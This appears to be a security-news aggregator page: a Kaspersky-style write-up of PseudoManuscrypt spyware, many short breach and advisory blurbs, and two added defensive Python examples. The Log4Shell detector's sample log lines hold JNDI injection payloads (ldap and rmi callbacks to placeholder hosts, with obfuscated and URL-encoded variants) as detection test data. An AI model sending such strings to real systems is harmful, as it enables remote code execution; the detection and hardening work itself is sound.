In June 2021, our specialists discovered new malware called PseudoManuscrypt. They didn't go out hunting specifically for it; our standard antivirus engine detected the malicious files, which were similar to known malware.

Why PseudoManuscrypt is dangerous

PseudoManuscrypt's methods are fairly standard for spyware. It starts with a keylogger, grabbing information about established VPN connections and saved passwords. It also regularly steals clipboard contents, records sound using the built-in microphone (if the computer has one), and conducts a general analysis of the compromised system. One variant can also steal the credentials of the QQ and WeChat messengers, capture images, and write the captured images to video files. It then sends the data to the attackers' server. It also includes a tool for disabling security solutions. None of the above is unusual or surprising. It's PseudoManuscrypt's infection mechanism that makes it interesting. For the technical details of the attack and indicators of compromise, see our ICS CERT report.

Origin of the name

Our experts found some similarities between the new attack and the already known Manuscrypt campaign, but analysis revealed that a completely different actor, the APT41 group, had previously used part of the malware code in its attacks. We have yet to establish responsibility for the new attack, and for now we're calling it PseudoManuscrypt. Such attribution problems are interesting in themselves, and they are usually related to attempts by one group of attackers to pose as another threat actor. Planting false flags is not a new strategy.

How PseudoManuscrypt infects a system

Successful infection rests on a rather complex chain of events. The attack on a computer usually begins when the user downloads and executes a pirated key generator for popular software. PseudoManuscrypt bait is easy to find: search the Internet for a pirated key generator to register some piece of software. Websites that distribute malicious code matching popular queries rank high in search engine results, a metric the attackers seem to monitor. Here you can clearly see why there have been so many attempts to infect industrial systems: in addition to providing keys for popular software (such as office suites, security solutions, navigation systems, and 3D first-person shooters), the attackers also offer fake cracks for professional software, including certain utilities for interacting with PLCs over Modbus. The result: an abnormally high number of infections in industrial organizations (7.2% of the total).

Search results for pirated software. PseudoManuscrypt can be found at the very first link.

The example in the screenshot above features software for system administrators and network engineers. Such an attack vector could provide attackers with immediate, full access to the company's infrastructure. The attackers also use a Malware-as-a-Service delivery mechanism, paying other cybercriminals to distribute PseudoManuscrypt. That practice gave rise to an interesting feature we found when analyzing the malicious files: some were bundled with other malware that the victim installed as a single package. The purpose of PseudoManuscrypt is to spy, but the other malicious programs pursue other objectives, such as data encryption and extortion.

Who is PseudoManuscrypt targeting?

The largest number of PseudoManuscrypt detections have occurred in Russia, India, Brazil, Vietnam, and Indonesia. Of the huge number of attempts to run malicious code, users at industrial organizations account for a significant share. Victims in this sector include managers of building automation systems, energy companies, manufacturers, construction companies, and even service providers for water treatment plants. The overwhelming majority of hacking attempts were aimed at developers of certain solutions used in industry.

Methods for defending against PseudoManuscrypt

Overall, standard malware detection and blocking tools provide effective protection against PseudoManuscrypt, but only if they are installed on 100% of a company's systems. In addition, we recommend instituting policies that make disabling protection difficult. For IT systems in industry, we also offer a specialized solution, Kaspersky Industrial CyberSecurity, which both protects computers (including specialized ones) and monitors data transfers that use specific protocols. Also keep in mind the importance of raising personnel awareness of cybersecurity risks. You can't totally rule out the possibility of clever phishing attacks, but you can help staff stay alert, and also educate them about the danger of installing unauthorized (and especially pirated) software on computers with access to industrial systems.
In this episode of the podcast (#232), Tomislav Peričin of the firm ReversingLabs joins us to talk about Log4Shell, the vulnerability in the ubiquitous Log4j Apache library. Tomislav tells us why issues related to Log4j won't be going away anytime soon and how organizations must adapt to deal with the risk it poses.
Google has explained how NSO Group developed an exploit that would allow users of its software to gain access to an iPhone and install spyware – without a target ever even clicking a link.
Emotet has been observed installing Cobalt Strike beacons directly, giving threat actors who use the beacons to spread laterally through a network, steal files, and deliver malware quick access to the infiltrated networks.
The Ransomware as a Service (RaaS) landscape underwent another major shift in the third quarter as new variants emerged to become the dominant players in the ecosystem, according to Intel 471.
CERT Yoroi tracked a malware distribution infrastructure that was abusing the Bitbucket code repository service to evade detection mechanisms and URL and domain reputation checks.
The state of New Jersey alleged that Regional Cancer Care Associates LLC, RCCA MSO LLC, and RCCA MD LLC failed to adequately safeguard the personal data and PHI of thousands of cancer patients.
These firms are said to have targeted an estimated 50,000 victims, including journalists, dissidents, critics of authoritarian regimes, families of opposition, and human rights activists.
This attack could have given total visibility into and complete control of the network, and thus could be used as the first step in a multi-stage attack to penetrate this or other networks more deeply.
Europe’s foray into quantum communication is extremely promising. It establishes a secure form of encryption, protecting communications against eavesdropping or even from being controlled by a hacker.
The targets of the attack by the group called "Charming Kitten" included the Israeli "government and business sector", Check Point said in a statement late Wednesday, without providing specifics.
Ransomware is a primary threat for businesses, and with the past year or so considered the golden era for operators, security experts say this criminal enterprise will reach new heights in the future.
The top three security priorities are adding layered security for truly secure remote work, making remote work easier for end-users, and making remote work easier for admins.
The Coombe hospital isolated and locked down its IT services once the ransomware attack was discovered “on a precautionary basis” and is working with the HSE to resolve the issue.
Advertised as an app that allowed users to personalize their default SMS messages, Color Message was a front to deliver Joker, one of the most prolific forms of Android malware.
The Richmond-based cultural institution said “there is no evidence” that the security breach is connected to the ransomware attack on the IT systems for Virginia legislative agencies.
Qumra Capital led the round with support from new investor Forgepoint Capital and participation from existing investors Accel, Glilot Capital Partners, Norwest Venture Partners, and Target Global.
This move by cybercriminals from LDAP callback URLs to RMI is a significant advance in the continuing attack, and companies must be aware of it when attempting to secure all potential channels.
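The blurb above is the practical point: a detection that only looks for the literal "${jndi:ldap://" misses RMI callbacks, URL-encoded payloads and the nested-lookup obfuscation (${lower:j}, ${::-j}) seen in real traffic. The Python below is an added example written for this page, not code from Blumira, the Log4j project or any of the vendors cited here. It normalises each log line and then matches any JNDI scheme. The access-log lines and the 203.0.113.0/24 callback hosts are constructed; the resolver assumes that any env/sys key an attacker uses for obfuscation is undefined on the target, so Log4j would substitute the ":-" default.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). The callback hosts
# use the 203.0.113.0/24 documentation range.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"
10.0.0.7 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.10:1389/a}"
10.0.0.8 - - [13/Dec/2021:10:01:09 +0000] "GET /?x=${jndi:rmi://203.0.113.10:1099/obj} HTTP/1.1" 404 "-" "curl/7.68.0"
10.0.0.9 - - [13/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}${::-d}ap://203.0.113.11/x}"
10.0.0.10 - - [13/Dec/2021:10:02:30 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.12%2Fz%7D HTTP/1.1" 200 "-" "-"
10.0.0.11 - - [13/Dec/2021:10:03:00 +0000] "GET /docs/jndi-ldap-tutorial HTTP/1.1" 200 "-" "Mozilla/5.0"
"""

# An innermost ${...} lookup: one with no further ${ inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# What the payload looks like once obfuscation is stripped: ${jndi:<scheme>:...}.
# The scheme list covers the JNDI providers seen in the wild, not just ldap.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:\s*//?([^}\s]*)",
    re.I,
)


def _resolve(body: str):
    """Return the literal text a single obfuscation lookup evaluates to, or
    None to leave it in place.

    Handles ${lower:x} / ${upper:x} and the ${prefix:key:-default} form.
    Assumption: any env/sys/etc. key used for obfuscation is undefined on the
    target, so Log4j would substitute the default after ':-'.
    """
    prefix = body.split(":", 1)[0].lower()
    if prefix == "jndi":
        return None  # this is the lookup we want to keep and detect
    if ":-" in body:
        return body.split(":-", 1)[1]
    if prefix in ("lower", "upper") and ":" in body:
        return body.split(":", 1)[1]
    return None


def normalize(line: str, max_rounds: int = 10) -> str:
    """Undo URL encoding (possibly stacked) and nested-lookup obfuscation."""
    for _ in range(3):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    for _ in range(max_rounds):
        changed = False

        def sub(m):
            nonlocal changed
            replacement = _resolve(m.group(1))
            if replacement is None:
                return m.group(0)
            changed = True
            return replacement

        line = _INNERMOST.sub(sub, line)
        if not changed:
            break
    return line


def find_jndi(line: str):
    """All (scheme, target) JNDI lookups in one log line, after normalisation."""
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(line))]


def scan(log_text: str):
    """Scan a whole log; return one hit dict per JNDI lookup found."""
    hits = []
    for lineno, raw in enumerate(log_text.splitlines(), 1):
        for scheme, target in find_jndi(raw):
            hits.append({"line": lineno, "scheme": scheme, "target": target})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi via {hit['scheme']} -> {hit['target']}")
```

Run it over every header and parameter your application logs, not just the User-Agent: the point of the blurb is that the callback channel and the injection point both vary. Pattern matching of this kind is a triage signal, not a patch; other lookup forms (for example ${date:...}) are not resolved here, and the real fix is the Log4j update.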
While QAKBOT is one of the payloads it stages filelessly in the registry, the stager is also capable of staging multiple malware families, a capability that can be abused for more campaigns in the future.
Finite Recruitment has confirmed it experienced a cyber incident in October, which resulted in a "small subset" of the company's data being downloaded and published on the dark web.
At its core, the bug is related to Windows Cloud Clipboard, a feature added in the Windows 10 v1809 release that allows users to sync their local clipboard history to their Microsoft accounts.
As per Chainalysis' 2022 Crypto Crime Report, crypto scams earned $7.7 billion from victims worldwide, an 81% rise over 2020. Rug pulls accounted for 37% of all crypto scam revenue.
Researchers uncovered details about the Earth Centaur group, which has been targeting transportation firms and government agencies associated with transportation. The report suggests that the group attempts to access internal documents and personal information that may be used in future attacks. Experts believe the observed activities of Earth Centaur may be only a small part of its overall operations.
A class-action lawsuit against Canadian financial services firm Desjardins has provisionally settled for $156 million after a 2019 data breach exposed the personal information of 10 million customers.
To seek out Log4Shell vulnerabilities in newly built open-source software, Google is partnering with security firm Code Intelligence to provide continuous fuzzing for Log4j.
According to Blumira, this newly discovered JavaScript WebSocket attack vector can be exploited by reaching a vulnerable service listening on the victim's own machine or on the local network.
It was fixed with the release of VMware Workspace ONE UEM console versions 21.5.0.37, 21.2.0.27, 20.11.0.40, and 20.0.8.36. VMware Workspace ONE UEM patch 21.9.0.13 and above also address the bug.
A new Kaspersky study has highlighted how scammers are trying to take advantage of the excitement surrounding the new film, with intensified activity observed ahead of its premiere.
In July 2021, KELA discovered 48 discussion threads on dark web marketplaces. From those threads, KELA determined that ransomware actors look for certain criteria when looking to purchase accesses.
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs). This is the source code release.
This bug report describes a vulnerability in ART that allows normal applications to insert arbitrary code into unused executable memory in zygote and other applications.
Ubuntu Security Notice 5192-2 - USN-5192-1 fixed a vulnerability in Apache Log4j 2. This update provides the corresponding update for Ubuntu 16.04 ESM. Chen Zhaojun discovered that Apache Log4j 2 allows remote attackers to run programs via specially crafted input. An attacker could use this vulnerability to cause a denial of service or possibly execute arbitrary code. Various other issues were also addressed.
Ubuntu Security Notice 5202-1 - Varnavas Papaioannou discovered that the FTP client implementation in OpenJDK accepted alternate server IP addresses when connecting with FTP passive mode. An attacker controlling an FTP server that an application connects to could possibly use this to expose sensitive information. This issue only affected Ubuntu 16.04 ESM, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 21.04. Markus Loewe discovered that OpenJDK did not properly handle JAR files containing multiple manifest files. An attacker could possibly use this to bypass JAR signature verification. This issue only affected Ubuntu 16.04 ESM, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 21.04. Various other issues were also addressed.
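Both issues in USN-5202-1 come down to a client trusting a value it should have cross-checked: the address in a PASV reply, and the count of manifest entries in a JAR. The Python below is an added example written for this page, not OpenJDK's code or its fix; it shows the two checks a hardened client would make. parse_pasv uses the address the control connection is actually talking to unless the caller explicitly opts in to trusting the server's address, and verify_jar_manifest refuses an archive with more than one META-INF/MANIFEST.MF. The PASV replies, the 198.51.100.0/24 addresses and the in-memory JARs are constructed for the example.

```python
import io
import re
import warnings
import zipfile
from ipaddress import ip_address

# --- FTP passive mode: do not let the server redirect the data channel --------

# "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)"
_PASV = re.compile(r"^227 .*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def parse_pasv(reply: str, control_peer: str, trust_pasv_address: bool = False):
    """Parse a PASV reply and return (host, port) for the data connection.

    control_peer is the IP the control connection is actually talking to.
    By default the server-supplied address is informational only: if it
    differs from control_peer, the data connection still goes to control_peer,
    so a malicious server cannot make the client open a connection to a third
    host of its choosing. trust_pasv_address=True restores the old, trusting
    behaviour for the rare setups (NAT helpers) that genuinely need it.
    """
    m = _PASV.match(reply)
    if not m:
        raise ValueError("not a 227 passive-mode reply")
    host = ".".join(m.group(i) for i in range(1, 5))
    ip_address(host)  # raises ValueError if an octet is outside 0..255
    port = int(m.group(5)) * 256 + int(m.group(6))
    if not 0 < port < 65536:
        raise ValueError("data port out of range")
    if host != control_peer and not trust_pasv_address:
        return control_peer, port
    return host, port


# --- JAR manifests: exactly one META-INF/MANIFEST.MF or the archive is refused --

MANIFEST = "META-INF/MANIFEST.MF"


def manifest_entries(jar_bytes: bytes):
    """Names of every entry that could be read as the manifest, in archive order.

    ZIP permits duplicate names. A lenient reader may take one copy for the
    signature check and the other for Main-Class and friends, which is the
    confusion the advisory describes."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return [i.filename for i in zf.infolist() if i.filename.upper() == MANIFEST]


def verify_jar_manifest(jar_bytes: bytes) -> bool:
    """True only when the archive carries exactly one manifest entry."""
    return len(manifest_entries(jar_bytes)) == 1


def build_jar(entries):
    """Construct an in-memory JAR from (name, bytes) pairs. Duplicate names are
    written deliberately so the check above has something to reject."""
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")  # zipfile warns on duplicate names but still writes them
        with zipfile.ZipFile(buf, "w") as zf:
            for name, data in entries:
                zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: a normal JAR and one with a second, conflicting manifest.
GOOD_JAR = build_jar([
    (MANIFEST, b"Manifest-Version: 1.0\n"),
    ("Hello.class", b"\xca\xfe\xba\xbe"),
])
BAD_JAR = build_jar([
    (MANIFEST, b"Manifest-Version: 1.0\n"),
    (MANIFEST, b"Manifest-Version: 1.0\nMain-Class: Evil\n"),
    ("Hello.class", b"\xca\xfe\xba\xbe"),
])

if __name__ == "__main__":
    print(parse_pasv("227 Entering Passive Mode (10,0,0,9,4,1)", "198.51.100.7"))
    print("good jar ok:", verify_jar_manifest(GOOD_JAR))
    print("bad jar ok:", verify_jar_manifest(BAD_JAR))
```

The PASV check is the one to keep in mind when an FTP client sits behind an outbound proxy or NAT: the legitimate cases where the data address differs from the control peer are exactly the ones an opt-in flag should cover, never the default. For the JAR check, count entries in the central directory rather than looking the name up once, since a lookup by name returns only one of the duplicates.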
Red Hat Security Advisory 2021-5186-04 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include a code execution vulnerability.
Red Hat Security Advisory 2021-5183-06 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include a code execution vulnerability.
Red Hat Security Advisory 2021-5184-04 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include a code execution vulnerability.
Red Hat Security Advisory 2021-5107-06 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include code execution and denial of service vulnerabilities.
Red Hat Security Advisory 2021-5179-02 - PostgreSQL is an advanced object-relational database management system. Issues addressed include a man-in-the-middle vulnerability.
Red Hat Security Advisory 2021-5195-02 - Red Hat Identity Management is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments.
Red Hat Security Advisory 2021-5192-04 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information.
Red Hat Security Advisory 2021-5171-03 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include HTTP request smuggling and denial of service vulnerabilities.
Red Hat Security Advisory 2021-5191-02 - Red Hat 3scale API Management delivers centralized API management features through a distributed, cloud-hosted layer. It includes built-in features to help in building a more successful API program, including access control, rate limits, payment gateway integration, and developer experience tools. This advisory is intended for use with Container Images for Red Hat 3scale API Management 2.11.1. Issues addressed include an XML injection vulnerability.
Red Hat Security Advisory 2021-5197-03 - PostgreSQL is an advanced object-relational database management system. Issues addressed include a man-in-the-middle vulnerability.
Google's OSS Fuzz tool aims to make common open source software more secure and stable by combining modern fuzzing techniques with scalable, distributed execution.
Call For Papers for RootedCON 2022, a technology congress that will be held in Madrid, Spain March 10th through the 12th of 2022. The conference has a capacity of 2,500 to 3,000 people.
Ubuntu Security Notice 5198-1 - It was discovered that HTMLDOC improperly handled malformed URIs from an input html file. An attacker could use this to cause a denial of service.
Ubuntu Security Notice 5199-1 - It was discovered that the urllib.request.AbstractBasicAuthHandler class in Python contains regex with a quadratic worst-case time complexity. Specially crafted traffic from a malicious HTTP server could cause a regular expression denial of service condition for a client. It was discovered that the Python urllib http client could enter into an infinite loop when incorrectly handling certain server responses. Specially crafted traffic from a malicious HTTP server could cause a denial of service condition for a client. Various other issues were also addressed.
Ubuntu Security Notice 5201-1 - It was discovered that the Python urllib http client could enter into an infinite loop when incorrectly handling certain server responses. Specially crafted traffic from a malicious HTTP server could cause a denial of service condition for a client.
Ubuntu Security Notice 5200-1 - It was discovered that the urllib.request.AbstractBasicAuthHandler class in Python contains regex allowing for catastrophic backtracking. Specially crafted traffic from a malicious HTTP server could cause a regular expression denial of service condition for a client. It was discovered that the urllib.request.AbstractBasicAuthHandler class in Python contains regex with a quadratic worst-case time complexity. Specially crafted traffic from a malicious HTTP server could cause a regular expression denial of service condition for a client. Various other issues were also addressed.
Apple Security Advisory 2021-12-15-4 - Security Update 2021-008 Catalina addresses buffer overflow, bypass, code execution, heap corruption, out of bounds read, out of bounds write, and use-after-free vulnerabilities.
Apple Security Advisory 2021-12-15-3 - macOS Big Sur 11.6.2 addresses buffer overflow, bypass, code execution, heap corruption, out of bounds read, out of bounds write, and use-after-free vulnerabilities.
Apple Security Advisory 2021-12-15-2 - macOS Monterey 12.1 addresses buffer overflow, bypass, code execution, heap corruption, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.
Apple Security Advisory 2021-12-15-1 - iOS 15.2 and iPadOS 15.2 addresses buffer overflow, bypass, code execution, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.
Cryptocurrency users in Ethiopia, Nigeria, India, Guatemala, and the Philippines are being targeted by a new variant of the Phorpiex botnet called Twizt that has resulted in the theft of virtual coins worth $500,000 over the past year. Israeli security firm Check Point Research, which detailed the attacks, said the latest evolutionary version "enables the botnet to operate
Industrial and government organizations, including enterprises in the military-industrial complex and research laboratories, are the targets of a new malware botnet dubbed PseudoManuscrypt that has infected roughly 35,000 Windows computers this year alone. The name comes from its similarities to the Manuscrypt malware, which is part of the Lazarus APT group's attack toolset, Kaspersky
It's no secret that the internet isn't a very safe place. And it's not hard to understand why. It's a medium that connects billions of people around the world and affords bad actors enough anonymity to wreak havoc without getting caught. It's almost as if the internet were tailor-made to enable scams and fraud. And that's just what it does. Right now, the world's on track to lose $10.5 trillion
Meta Platforms on Thursday revealed it took steps to deplatform seven cyber mercenaries that it said carried out "indiscriminate" targeting of journalists, dissidents, critics of authoritarian regimes, families of opposition, and human rights activists located in over 100 countries, amid mounting scrutiny of surveillance technologies. To that end, the company said it alerted 50,000 users of